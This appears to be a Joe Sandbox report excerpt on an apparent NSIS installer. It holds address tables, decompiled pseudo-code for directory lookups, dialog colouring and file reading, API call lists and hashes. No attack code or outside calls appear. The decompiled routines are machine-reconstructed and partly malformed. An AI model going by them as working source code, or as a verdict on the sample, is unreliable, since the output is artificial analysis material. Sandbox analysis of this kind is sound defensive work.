                                                                                                                                                                                                                            0x00406866
                                                                                                                                                                                                                            0x0040686d
                                                                                                                                                                                                                            0x0040686d
                                                                                                                                                                                                                            0x00406888
                                                                                                                                                                                                                            0x0040688b
                                                                                                                                                                                                                            0x0040684f
                                                                                                                                                                                                                            0x00406850
                                                                                                                                                                                                                            0x00406850
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040688b
                                                                                                                                                                                                                            0x00406771
                                                                                                                                                                                                                            0x00406775
                                                                                                                                                                                                                            0x00406775
                                                                                                                                                                                                                            0x00406776
                                                                                                                                                                                                                            0x00406778
                                                                                                                                                                                                                            0x004067b5
                                                                                                                                                                                                                            0x004067b8
                                                                                                                                                                                                                            0x004067c8
                                                                                                                                                                                                                            0x004067cb
                                                                                                                                                                                                                            0x004067d3
                                                                                                                                                                                                                            0x004067d9
                                                                                                                                                                                                                            0x004067d9
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x00406836
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004067dd
                                                                                                                                                                                                                            0x004067e2
                                                                                                                                                                                                                            0x004067e3
                                                                                                                                                                                                                            0x004067e5
                                                                                                                                                                                                                            0x004067fc
                                                                                                                                                                                                                            0x0040680a
                                                                                                                                                                                                                            0x00406810
                                                                                                                                                                                                                            0x00406812
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406830
                                                                                                                                                                                                                            0x00406818
                                                                                                                                                                                                                            0x00406821
                                                                                                                                                                                                                            0x00406824
                                                                                                                                                                                                                            0x0040682a
                                                                                                                                                                                                                            0x0040682e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040682e
                                                                                                                                                                                                                            0x004067f6
                                                                                                                                                                                                                            0x004067f8
                                                                                                                                                                                                                            0x004067fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004067fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406834
                                                                                                                                                                                                                            0x004067c0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040677a
                                                                                                                                                                                                                            0x00406798
                                                                                                                                                                                                                            0x004067a1
                                                                                                                                                                                                                            0x0040683e
                                                                                                                                                                                                                            0x00406842
                                                                                                                                                                                                                            0x0040684a
                                                                                                                                                                                                                            0x0040684a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406842
                                                                                                                                                                                                                            0x004067ab
                                                                                                                                                                                                                            0x00406838
                                                                                                                                                                                                                            0x0040683c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040683c
                                                                                                                                                                                                                            0x00406778
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406705

APIs
• GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
• GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
• lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
Strings
Memory Dump Source
• Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
Similarity
• API ID: Directory$SystemWindowslstrcatlstrlen
• String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 4260037668-301486440
• Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
• Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
• Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
• Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E687E2655() {
                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 = E687E12BB();
                                                                                                                                                                                                                            				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                                                                                                                                                            				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                                                                                                                            				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                                                                                                                                                            					if(_t39 <= 7) {
                                                                                                                                                                                                                            						switch( *((intOrPtr*)(_t39 * 4 +  &M687E2784))) {
                                                                                                                                                                                                                            							case 0:
                                                                                                                                                                                                                            								 *_t40 = 0;
                                                                                                                                                                                                                            								goto L17;
                                                                                                                                                                                                                            							case 1:
                                                                                                                                                                                                                            								__eax =  *__eax;
                                                                                                                                                                                                                            								if(__ecx > __ebx) {
                                                                                                                                                                                                                            									 *(__esp + 0x10) = __ecx;
                                                                                                                                                                                                                            									__ecx =  *(0x687e407c + __edx * 4);
                                                                                                                                                                                                                            									__edx =  *(__esp + 0x10);
                                                                                                                                                                                                                            									__ecx = __ecx * __edx;
                                                                                                                                                                                                                            									asm("sbb edx, edx");
                                                                                                                                                                                                                            									__edx = __edx & __ecx;
                                                                                                                                                                                                                            									__eax = __eax &  *(0x687e409c + __edx * 4);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_push(__eax);
                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                            							case 2:
                                                                                                                                                                                                                            								__eax = E687E1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							case 3:
                                                                                                                                                                                                                            								__ecx =  *0x687e506c;
                                                                                                                                                                                                                            								__edx = __ecx - 1;
                                                                                                                                                                                                                            								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                                                                                                                                                            								__eax =  *0x687e506c;
                                                                                                                                                                                                                            								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                                                                                                                                                            								goto L17;
                                                                                                                                                                                                                            							case 4:
                                                                                                                                                                                                                            								__eax = lstrcpynW(__edi,  *__eax,  *0x687e506c);
                                                                                                                                                                                                                            								goto L17;
                                                                                                                                                                                                                            							case 5:
                                                                                                                                                                                                                            								_push( *0x687e506c);
                                                                                                                                                                                                                            								_push(__edi);
                                                                                                                                                                                                                            								_push( *__eax);
                                                                                                                                                                                                                            								" {\'t@u\'t"();
                                                                                                                                                                                                                            								goto L17;
                                                                                                                                                                                                                            							case 6:
                                                                                                                                                                                                                            								_push( *__esi);
                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                            								__eax = wsprintfW(__edi, 0x687e5000);
                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                            								__esp = __esp + 0xc;
                                                                                                                                                                                                                            								goto L17;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                            					_t26 =  *(_t43 + 0x14);
                                                                                                                                                                                                                            					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                                                                                                                            						GlobalFree(_t26);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                            						if(_t27 != 0xffffffff) {
                                                                                                                                                                                                                            							if(_t27 > 0) {
                                                                                                                                                                                                                            								E687E1381(_t27 - 1, _t40);
                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E687E1312(_t40);
                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t44 = _t44 - 1;
                                                                                                                                                                                                                            					_t43 = _t43 - 0x20;
                                                                                                                                                                                                                            				} while (_t44 >= 0);
                                                                                                                                                                                                                            				return GlobalFree(_t40);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2692
                                                                                                                                                                                                                            0x687e272d
                                                                                                                                                                                                                            0x687e272d
                                                                                                                                                                                                                            0x687e2732
                                                                                                                                                                                                                            0x687e2743
                                                                                                                                                                                                                            0x687e2743
                                                                                                                                                                                                                            0x687e2749
                                                                                                                                                                                                                            0x687e274e
                                                                                                                                                                                                                            0x687e2753
                                                                                                                                                                                                                            0x687e275f
                                                                                                                                                                                                                            0x687e2764
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2769
                                                                                                                                                                                                                            0x687e2755
                                                                                                                                                                                                                            0x687e2756
                                                                                                                                                                                                                            0x687e276a
                                                                                                                                                                                                                            0x687e276a
                                                                                                                                                                                                                            0x687e2753
                                                                                                                                                                                                                            0x687e276b
                                                                                                                                                                                                                            0x687e276c
                                                                                                                                                                                                                            0x687e276f
                                                                                                                                                                                                                            0x687e2783

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E12BB: GlobalAlloc.KERNEL32(00000040,?,687E12DB,?,687E137F,00000019,687E11CA,-000000A0), ref: 687E12C5
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2743
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2778
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                                                            • String ID: {'t@u't
                                                                                                                                                                                                                            • API String ID: 1780285237-541310889
                                                                                                                                                                                                                            • Opcode ID: c44dd1ff84bb5579a0aa428c9a48f75f1a6f7958e6706cd9969b267ea74de860
                                                                                                                                                                                                                            • Instruction ID: bbdf88771f1fde4447d003fc7d50dc31932461ff56bf08a341af4ae5a831bae4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c44dd1ff84bb5579a0aa428c9a48f75f1a6f7958e6706cd9969b267ea74de860
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B319A71214506EBCB258F64DECCC2E7BB7FB8B3457984678F22187620C731A8059B71
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				signed char _t50;
                                                                                                                                                                                                                            				long* _t54;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                                                                                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t50 = _t54[5];
                                                                                                                                                                                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                                                                                                            						goto L18;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t39 =  *_t54;
                                                                                                                                                                                                                            					if((_t50 & 0x00000002) != 0) {
                                                                                                                                                                                                                            						_t39 = GetSysColor(_t39);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                                                                                                            						SetTextColor(_a8, _t39);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					SetBkMode(_a8, _t54[4]);
                                                                                                                                                                                                                            					_t41 = _t54[1];
                                                                                                                                                                                                                            					_v16.lbColor = _t41;
                                                                                                                                                                                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                                                                                                            						_t41 = GetSysColor(_t41);
                                                                                                                                                                                                                            						_v16.lbColor = _t41;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                                                                                                            						SetBkColor(_a8, _t41);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                                                                                                            						_v16.lbStyle = _t54[2];
                                                                                                                                                                                                                            						_t44 = _t54[3];
                                                                                                                                                                                                                            						if(_t44 != 0) {
                                                                                                                                                                                                                            							DeleteObject(_t44);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t54[3];
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            0x004046ee

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = __edx;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                                                                                                                            				_t65 = 2;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                                                                                                                                                            				_t66 = E00402D84(_t65);
                                                                                                                                                                                                                            				_t79 = _t66 - 1;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                                                                                                                                                            				if(_t79 < 0) {
                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					__ecx = 0x3ff;
                                                                                                                                                                                                                            					if(__eax > 0x3ff) {
                                                                                                                                                                                                                            						 *(__ebp - 0x44) = 0x3ff;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *__edi == __bx) {
                                                                                                                                                                                                                            						L34:
                                                                                                                                                                                                                            						__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            						__eax =  *(__ebp - 8);
                                                                                                                                                                                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                                                                                                                            						if(_t79 == 0) {
                                                                                                                                                                                                                            							 *(_t76 - 4) = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *(__ebp - 0x38) = __ebx;
                                                                                                                                                                                                                            						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                                                                                                                                                                            						if( *(__ebp - 0x44) > __ebx) {
                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                                                                                                                                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                                                                                                                                                            										__eax = __ebp - 0x50;
                                                                                                                                                                                                                            										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                                                                                                                                                            											goto L34;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											goto L21;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									__eax = __ebp - 0x40;
                                                                                                                                                                                                                            									_push(__ebx);
                                                                                                                                                                                                                            									_push(__ebp - 0x40);
                                                                                                                                                                                                                            									__eax = 2;
                                                                                                                                                                                                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                                                                                                                                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                                                                                                                                                            									if(__eax == 0) {
                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            										if(__ecx == __ebx) {
                                                                                                                                                                                                                            											goto L34;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x4c) = __ecx;
                                                                                                                                                                                                                            											 *(__ebp - 0x50) = __eax;
                                                                                                                                                                                                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                                                                                                                            												L28:
                                                                                                                                                                                                                            												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__ebp - 0x50 = __ebp + 0xa;
                                                                                                                                                                                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                                                                                                                                                            													L21:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__edi =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            													__edi =  ~( *(__ebp - 0x4c));
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														_t22 = __ebp - 0x40;
                                                                                                                                                                                                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            														__eax = 0xfffd;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) = 0xfffd;
                                                                                                                                                                                                                            														if( *_t22 == 0) {
                                                                                                                                                                                                                            															goto L22;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                                                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                                                                                                                                                            														__eax = __ebp + 0xa;
                                                                                                                                                                                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                                                                                                                                                            															continue;
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															goto L21;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L22:
                                                                                                                                                                                                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                                                                                                                            													goto L28;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                                                                                                                                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                                                                                                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                                                                                                                                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            															__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														goto L34;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            														__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                                                                                                                            														 *(__ebp - 0x38) = __eax;
                                                                                                                                                                                                                            														if(__ax == __bx) {
                                                                                                                                                                                                                            															goto L34;
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															goto L26;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L37;
                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                            								__eax =  *(__ebp - 8);
                                                                                                                                                                                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L34;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L37:
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x0040279e
                                                                                                                                                                                                                            0x00402804
                                                                                                                                                                                                                            0x00402807
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402809
                                                                                                                                                                                                                            0x0040280e
                                                                                                                                                                                                                            0x0040284f
                                                                                                                                                                                                                            0x00402871
                                                                                                                                                                                                                            0x00402878
                                                                                                                                                                                                                            0x0040285d
                                                                                                                                                                                                                            0x0040285d
                                                                                                                                                                                                                            0x00402860
                                                                                                                                                                                                                            0x00402863
                                                                                                                                                                                                                            0x00402866
                                                                                                                                                                                                                            0x00402866
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402817
                                                                                                                                                                                                                            0x00402817
                                                                                                                                                                                                                            0x0040281a
                                                                                                                                                                                                                            0x0040281d
                                                                                                                                                                                                                            0x00402823
                                                                                                                                                                                                                            0x00402827
                                                                                                                                                                                                                            0x0040282a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040282a
                                                                                                                                                                                                                            0x0040280e
                                                                                                                                                                                                                            0x00402807
                                                                                                                                                                                                                            0x0040277f
                                                                                                                                                                                                                            0x0040276b
                                                                                                                                                                                                                            0x00402760
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040282c
                                                                                                                                                                                                                            0x0040282c
                                                                                                                                                                                                                            0x0040282f
                                                                                                                                                                                                                            0x00402838
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040272f
                                                                                                                                                                                                                            0x0040271a
                                                                                                                                                                                                                            0x00402c33
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
